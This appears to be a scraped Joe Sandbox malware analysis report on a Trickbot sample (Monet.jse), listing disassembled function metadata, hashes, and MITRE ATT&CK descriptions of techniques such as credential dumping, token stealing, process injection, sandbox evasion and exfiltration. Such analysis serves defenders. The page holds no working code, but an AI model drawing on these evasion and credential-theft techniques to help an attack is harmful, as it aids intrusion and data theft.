APIs

VirtualAlloc.KERNEL32 ref: 0000000180095123
lstrcpy.KERNEL32 ref: 0000000180095136
wnsprintfA.SHLWAPI ref: 000000018009523B
lstrcat.KERNEL32 ref: 0000000180095249
lstrcat.KERNEL32 ref: 000000018009526C

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: lstrcat$AllocVirtuallstrcpywnsprintf
String ID:
API String ID: 558242896-0
Opcode ID: ddc3151dd6193fb634e2c8f8912d160bcd13338cfaca7c13480e6707251ca9c5
Instruction ID: bd8f334164231f18fa4c6de7de67b69eb1b05973fb9d83263cdd4549d54a3a31
Opcode Fuzzy Hash: ddc3151dd6193fb634e2c8f8912d160bcd13338cfaca7c13480e6707251ca9c5
Instruction Fuzzy Hash: 9F91A4362046C48AE7A38F2AE4513ED7BA1FB4D7C9F449115EEC947754EA78C749CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800CE078, Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001800CE0C9

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 308031d6d0748dace266fed4de24a7b445dc22eff467abb398a46b7c42eccdcf
Instruction ID: 4c720e4150ca5f6e805e72bf1c5226fe2f39bafe286fc4116a4d1d2c0f693eba
Opcode Fuzzy Hash: 308031d6d0748dace266fed4de24a7b445dc22eff467abb398a46b7c42eccdcf
Instruction Fuzzy Hash: 3B51B2322047C886E7A29F2194403AD77A5FB5ABE0F18C225FE66437D5DE38CB55C700

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.
Tactics:	Execution
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses Hooking to redirect the code as necessary in order to communicate with the OS.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, System calls, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command `runas` . Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information from learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Monet.jse

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Cryptography:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Malware Configuration

Threatname: Trickbot

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

HTTPS Proxied Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Function 004013F6, Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 207
stringCOMMON

Function 0040276C, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 004012C6, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76
libraryCOMMON

Function 01CAE8BB, Relevance: 9.0, APIs: 6, Instructions: 37
sleepCOMMON

Function 00310000, Relevance: 9.0, Strings: 7, Instructions: 249
COMMON

Function 0032002D, Relevance: 4.9, APIs: 3, Instructions: 392
memoryCOMMON

Function 004012A1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
registryCOMMON

Function 0040270E, Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Function 00401268, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Function 004028FE, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP . Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control, Lateral Movement
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre